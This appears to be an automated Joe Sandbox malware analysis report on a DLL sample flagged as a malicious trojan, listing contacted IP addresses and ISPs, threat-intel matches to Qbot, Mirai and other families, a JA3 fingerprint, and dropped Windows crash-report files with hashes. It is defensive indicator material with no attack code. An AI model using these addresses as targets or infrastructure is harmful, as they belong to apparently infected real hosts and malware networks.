79.77.142.22	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	true
90.78.147.141	unknown	France	3215	FranceTelecom-OrangeFR	true
122.184.143.86	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	true
186.75.95.6	unknown	Panama	11556	CableWirelessPanamaPA	true
50.68.186.195	unknown	Canada	6327	SHAWCA	true
12.172.173.82	unknown	United States	2386	INS-ASUS	true
213.64.33.61	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
79.168.224.165	unknown	Portugal	2860	NOS_COMUNICACOESPT	true
86.97.55.89	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
176.142.207.63	unknown	France	5410	BOUYGTEL-ISPFR	true
92.154.17.149	unknown	France	3215	FranceTelecom-OrangeFR	true
174.58.146.57	unknown	United States	7922	COMCAST-7922US	true
78.160.146.127	unknown	Turkey	9121	TTNETTR	true
58.186.75.42	unknown	Viet Nam	18403	FPT-AS-APTheCorporationforFinancingPromotingTechnolo	true
223.166.13.95	unknown	China	17621	CNCGROUP-SHChinaUnicomShanghainetworkCN	true
65.95.141.84	unknown	Canada	577	BACOMCA	true
50.68.204.71	unknown	Canada	6327	SHAWCA	true
71.38.155.217	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	true
104.35.24.154	unknown	United States	20001	TWC-20001-PACWESTUS	true
220.240.164.182	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
103.123.223.133	unknown	India	138329	KWS-AS-APKenstarWebSolutionsPrivateLimitedIN	true
24.198.114.130	unknown	United States	11351	TWC-11351-NORTHEASTUS	true
2.36.64.159	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
198.2.51.242	unknown	United States	20001	TWC-20001-PACWESTUS	true
92.9.45.20	unknown	United Kingdom	13285	OPALTELECOM-ASTalkTalkCommunicationsLimitedGB	true
113.11.92.30	unknown	Bangladesh	7565	BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD	true
69.119.123.159	unknown	United States	6128	CABLE-NET-1US	true
69.123.4.221	unknown	United States	6128	CABLE-NET-1US	true
172.115.17.50	unknown	United States	20001	TWC-20001-PACWESTUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	878698
Start date and time:	2023-05-31 01:58:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	F072.dll
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@31/23@2/100
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 15.1% (good quality ratio 13.2%) Quality average: 68.1% Quality standard deviation: 33.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 31 Number of non-executed functions: 134
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.254, 13.89.179.12, 20.189.173.20, 52.168.117.173, 104.77.34.176
Excluded domains from analysis (whitelisted): l-9999.l-msedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, e10994.dscx.akamaiedge.net, l-ring.msedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, www.xfinity.com.edgekey.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, l-ring.l-9999.l-msedge.net
Execution Graph export aborted for target rundll32.exe, PID 5240 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
01:59:11	API Interceptor	5x Sleep call for process: WerFault.exe modified
01:59:16	API Interceptor	1x Sleep call for process: loaddll32.exe modified
01:59:26	API Interceptor	9x Sleep call for process: wermgr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
2.82.8.80	A649.dll	Get hash	malicious	Qbot	Browse
	5q4psw.msi	Get hash	malicious	Qbot	Browse
	15dasx.msi	Get hash	malicious	Qbot	Browse
	5q4psw.msi	Get hash	malicious	Qbot	Browse
	15dasx.msi	Get hash	malicious	Qbot	Browse
	licking.dll	Get hash	malicious	Qbot	Browse
	licking.dll	Get hash	malicious	Qbot	Browse
	main2.dll	Get hash	malicious	Qbot	Browse
	r3zg12.msi	Get hash	malicious	Qbot	Browse
	main.dll	Get hash	malicious	Qbot	Browse
	r3zg12.msi	Get hash	malicious	Qbot	Browse
	main.dll	Get hash	malicious	Qbot	Browse
	graphically.dat.dll	Get hash	malicious	Qbot	Browse
	kxyj5.dat.dll	Get hash	malicious	Qbot	Browse
	PXNuYAPR.dat.dll	Get hash	malicious	Qbot	Browse
	TB9mkKe4Qzu.dat.dll	Get hash	malicious	Qbot	Browse
	leiotrichy.js	Get hash	malicious	Qbot	Browse
	a0UFMZnC6ltxphw.dat.dll	Get hash	malicious	Qbot	Browse
	msfilter.dll	Get hash	malicious	Qbot	Browse
	QPAWJ8VnpO.dll	Get hash	malicious	Qbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xfinity.com	dqVPlpmWYt.exe	Get hash	malicious	Unknown	Browse	96.118.152.230
xfinity.com	#Ubb38#Uc11c.exe.exe	Get hash	malicious	Tofsee Xmrig	Browse	96.118.48.114

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MEO-RESIDENCIALPT	A649.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	5q4psw.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	15dasx.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	5q4psw.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	15dasx.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	licking.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	licking.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	main2.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	r3zg12.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	main.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	r3zg12.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	main.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	graphically.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	LEo7jDCX96.elf	Get hash	malicious	Mirai	Browse	2.81.219.243
	yvweY4vsVq.elf	Get hash	malicious	Mirai	Browse	188.81.116.228
	8C3RpG9eka.elf	Get hash	malicious	Mirai	Browse	85.244.28.246
	Pc8ewtsPRR.elf	Get hash	malicious	Mirai	Browse	85.240.179.8
	33cWz2DNq2.elf	Get hash	malicious	Mirai	Browse	2.83.183.198
	pu3jOk0Q9u.elf	Get hash	malicious	Mirai	Browse	82.155.117.104
	6mu5y2WWPK.elf	Get hash	malicious	Mirai	Browse	85.246.119.61
ASN-CXA-ALL-CCI-22773-RDCUS	A290.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	A649.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	5q4psw.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	15dasx.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	5q4psw.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	15dasx.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	licking.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	licking.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	main2.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	r3zg12.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	main.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	r3zg12.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	main.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	graphically.dat.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	UMyY7qXi7b.elf	Get hash	malicious	Mirai	Browse	68.6.72.41
	udxyqUncDs.elf	Get hash	malicious	Gafgyt, Mirai	Browse	184.188.248.242
	KipHfbWc5u.elf	Get hash	malicious	Mirai	Browse	174.74.5.188
	CT1zp877iP.elf	Get hash	malicious	Mirai	Browse	68.108.254.249
	65cBS6uCoV.elf	Get hash	malicious	Mirai	Browse	70.187.92.80
	gLeiWqaVuD.elf	Get hash	malicious	Mirai	Browse	24.249.120.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	F086.dll	Get hash	malicious	Qbot	Browse	68.87.41.40
	A290.dll	Get hash	malicious	Qbot	Browse	68.87.41.40
	A649.dll	Get hash	malicious	Qbot	Browse	68.87.41.40
	Gardenizes.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40
	FACTURA_ONLINE.jse	Get hash	malicious	Unknown	Browse	68.87.41.40
	FACTURA_ONLINE.jse	Get hash	malicious	Unknown	Browse	68.87.41.40
	Quote_Request_xlsx_PDF_PDF.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	68.87.41.40
	DHL_AWB_50_No3354087.docx.doc	Get hash	malicious	Unknown	Browse	68.87.41.40
	rechnm696417531.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	rechnm696417531.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	ORDER-232903AF.js	Get hash	malicious	WSHRat	Browse	68.87.41.40
	main.dll	Get hash	malicious	Qbot	Browse	68.87.41.40
	008s06523610054680b6011375030062022.exe	Get hash	malicious	GuLoader	Browse	68.87.41.40
	file.exe	Get hash	malicious	PrivateLoader	Browse	68.87.41.40
	rechnm128132812.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	rechnm128132812.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	ARMSTRONG5262023.xlsx	Get hash	malicious	Unknown	Browse	68.87.41.40
	setup.exe	Get hash	malicious	PrivateLoader	Browse	68.87.41.40
	ufuldkommenhederne.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40
	08194399.exe	Get hash	malicious	Djvu	Browse	68.87.41.40

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_792f64dfd282ce5c1f3ccd2775d0d855d365cbe7_82810a17_0b56d8a5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9052702089985385
Encrypted:	false
SSDEEP:	192:MSi30oXJHBUZMX4jed+J/u7skS274ItWc:9iJX5BUZMX4jeU/u7skX4ItWc
MD5:	2795598C49036A48A74A19DF9F6F4B71
SHA1:	3476B54B18D415205AA7BFBC159B0C3859EF2287
SHA-256:	B2F1023844ABF911348CBE9D7CA50C7105EE90FFB8E4C8B5446390AE79775D36
SHA-512:	75BF83C487C031A3BC45C048AE4B4654F9322C144F01B698367F0184E2BAFD0B5BCAE1164195D1E396F8992020CC650CD831614D7B684823DE01B89AE4A9D236
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.7.6.8.2.0.3.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.8.5.4.1.4.0.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.4.c.f.f.9.2.-.a.0.5.5.-.4.d.8.9.-.8.f.b.5.-.b.8.b.a.3.5.5.f.1.7.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.3.0.1.e.0.8.-.a.8.c.6.-.4.4.0.2.-.b.e.c.4.-.d.4.b.8.6.e.b.4.e.2.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.5.8.-.0.0.0.1.-.0.0.1.9.-.1.2.3.7.-.e.1.2.d.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_792f64dfd282ce5c1f3ccd2775d0d855d365cbe7_82810a17_162eca2e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9054146093167813
Encrypted:	false
SSDEEP:	192:phwi70oXzHBUZMX4jed+J/u7skS274ItWc:4ilXzBUZMX4jeU/u7skX4ItWc
MD5:	49188D2789A941249B4CB63AC1E845B9
SHA1:	B63F793517964C5978508E37FD63CA0C4FA898C0
SHA-256:	7C4D2E80D66AA2D87CA05C6ABC06E4D64448BFD2F54F46F22AA793D1DDD8B9D5
SHA-512:	A56EA3CA2747333C5FB697D861EC2852C4B50EE3D4BC687215E952434EF6B9AFBE07B43EDD0551A6D7313134B4865482EDF45432167856B88FF1983D06899460
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.4.0.8.5.6.2.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.4.8.3.5.6.3.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.c.9.8.9.b.6.-.b.4.e.0.-.4.2.4.c.-.9.e.d.6.-.4.2.7.2.e.f.5.f.6.5.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.9.b.6.2.6.e.-.e.5.6.e.-.4.7.b.9.-.9.a.3.7.-.1.0.4.7.7.c.c.d.0.2.e.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.4.c.-.0.0.0.1.-.0.0.1.9.-.2.8.3.2.-.f.b.2.b.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_875735debeb93db2959d1fbfa047a3f67cf9964f_82810a17_1626d8b5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9051018267592895
Encrypted:	false
SSDEEP:	192:O83iC0oXfHBUZMX4jed+J/u7skS274ItWcE:niEXfBUZMX4jeU/u7skX4ItWc
MD5:	72783B5C2E9149B526FE3FE551816AEB
SHA1:	E84E7D8BEC02CA368DC4153DE96FE0C6B90C2C36
SHA-256:	76ABC4AEC718FFBCF5FFDD10C431EAC6C9D360FD9744615EC50DC38C94D21DD9
SHA-512:	FC217BAC4324283728AFF5CDBE2FA5D49CABA9019C047DE0C17F714AB881D9AC980B751B2A5328CEB48F5D88675BD7B9174D8A8F88939DF0C5841B8094B5E57A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.7.7.4.4.8.4.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.8.7.4.4.8.5.1.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.c.f.1.4.2.3.-.0.4.c.6.-.4.b.d.0.-.b.c.9.1.-.6.d.8.a.d.c.9.1.6.b.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.c.1.6.0.b.0.-.d.0.8.6.-.4.0.f.a.-.8.f.1.1.-.1.0.8.d.2.b.0.5.b.1.2.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.7.c.-.0.0.0.1.-.0.0.1.9.-.7.6.2.1.-.d.1.2.d.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_875735debeb93db2959d1fbfa047a3f67cf9964f_82810a17_1adebbd6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9052431102174711
Encrypted:	false
SSDEEP:	192:8DQiv0oX4HBUZMX4jed+J/u7skS274ItWc:QQiRXgBUZMX4jeU/u7skX4ItWc
MD5:	D21AA729B823707F84DBC63F024D2A76
SHA1:	78896E9581FE6821301CAF57746428D8A309276B
SHA-256:	1AC472C773F6AE8640794706AFBC628933EC7A0C526B8D4E9E145CFF58AA4484
SHA-512:	9BC99C73D5732ED4DCAA4BA7557B71127125D7D45467290DF08EDB09B346DFC652078E04FC46A2E5642FC8857C58340C8C9498D59EFCC2A0F080D5501A99AB21
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.4.8.8.6.4.6.8.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.0.0.0.5.3.1.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.c.2.7.c.4.a.-.9.d.d.e.-.4.7.3.a.-.b.3.9.e.-.7.5.e.f.6.7.0.1.7.b.a.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.5.5.f.0.7.6.-.c.9.e.b.-.4.4.6.9.-.9.2.1.2.-.e.1.1.7.d.b.2.6.6.f.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.7.4.-.0.0.0.1.-.0.0.1.9.-.3.8.5.c.-.5.7.2.8.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_875735debeb93db2959d1fbfa047a3f67cf9964f_82810a17_1af2bbb7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9047557163759011
Encrypted:	false
SSDEEP:	192:igpQEiy0oXOHBUZMX4jed+J/u7skS274ItWc:+EiUXGBUZMX4jeU/u7skX4ItWc
MD5:	A890360959956FA91ACD65B7D8B109FF
SHA1:	BAFD4F337A275D13E113B7F8C340FF7E939875E5
SHA-256:	F50CEE7D17BB46C96F76DD66B7A674F2D2B77C83628774EABDD29836233015FD
SHA-512:	4B9549DD8BEA95B1EA63B8236205AF4C79595342530C6678FABD876D65F1666FB88BB21618C73BE0D7302CF59FA89B5AB663D9C13736FF4F6810190420ED8FF8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.4.8.7.8.3.4.3.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.0.0.3.3.4.2.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.f.8.d.1.c.2.-.5.6.1.c.-.4.e.b.3.-.8.0.a.e.-.1.d.d.5.d.d.6.9.2.2.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.b.6.a.1.c.4.-.c.7.6.f.-.4.d.8.8.-.9.0.0.7.-.c.1.7.c.7.a.5.1.0.3.9.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.7.8.-.0.0.0.1.-.0.0.1.9.-.8.d.a.5.-.5.3.2.8.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF34.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:09 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	44130
Entropy (8bit):	2.1129885510184807
Encrypted:	false
SSDEEP:	192:HbbLGYJO5SkbzTHvlTNj7kq6tLCONWg+p75x3gKp:m5LbzbX7kq6tugBiPp
MD5:	25DBEE74A690E169C438B8C53E54B64B
SHA1:	D2DB3ED2AED13D260452E318C8341226F1BDE9D2
SHA-256:	D4E4782FA9E93D76D8D765AE3D6AD65F865997002A3EAF241326CADEAE4CBC11
SHA-512:	6E49B5B5B0BC9A55E0F7FFC5EAC84F161D7C919EF0395F2F4B86556F91A52F6A96571FE5CCA622C0D4292E804A448AA748D6CE3CF8BC840307242C5B619ADA96
Malicious:	false
Preview:	MDMP....... .......].wd.........................................,..........T.......8...........T...............b...........0................................................................................U...........B..............GenuineIntelW...........T.......x...[.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF92.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:09 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	36730
Entropy (8bit):	2.289821263424622
Encrypted:	false
SSDEEP:	192:HA3ZcCZLCQHNU05O5SkbbxvDUlYaSXInl9qqKny7e/nBP:gJzna5LbbylJIIl9qqKy7OBP
MD5:	3F788523D54D69153E49F78C5DC1FFBC
SHA1:	70111FB41B318C2545143429F946EB91D3B439C2
SHA-256:	21EA9344D447BCED9CB898CCA5031A43861DE7ABC6B0ADBB93AD64E782EF1BB9
SHA-512:	34B10D476A18062CC6B581F47ACADA01AA02A137BA255B5AEA5571F8AB048BC0C508B1DC34CD5DFE43EA5A6C2D1DA762620F0A50E245C2F7CC49A367E2FD471E
Malicious:	false
Preview:	MDMP....... .......].wd............d...............l............)..........T.......8...........T...........P...*u...........................................................................................U...........B..............GenuineIntelW...........T.......t...[.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0FA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8246
Entropy (8bit):	3.6906597990132988
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiOs6m6Yke6hgmfTzSKCprd89bLDsfW5m:RrlsNi16m6Yd6hgmfTzS4LofZ
MD5:	2D56FDC5A1187B14F8D847999495BAF9
SHA1:	BDBB9B892C585E9CCF6105BBA25F4591DEFA8711
SHA-256:	104AE929922673AE6473DA7ACD0085160B1F398697EDAABAE0B2D3187DF86579
SHA-512:	A1CB1EFA91E5680B0162A3C03E76245C6FA1DDA6C4666E24F76BC0DF9506668C543E471B9EE4DA1855A8E2651C9BBE499E472EFD805C0205EBE1A06954135316
Malicious:	false
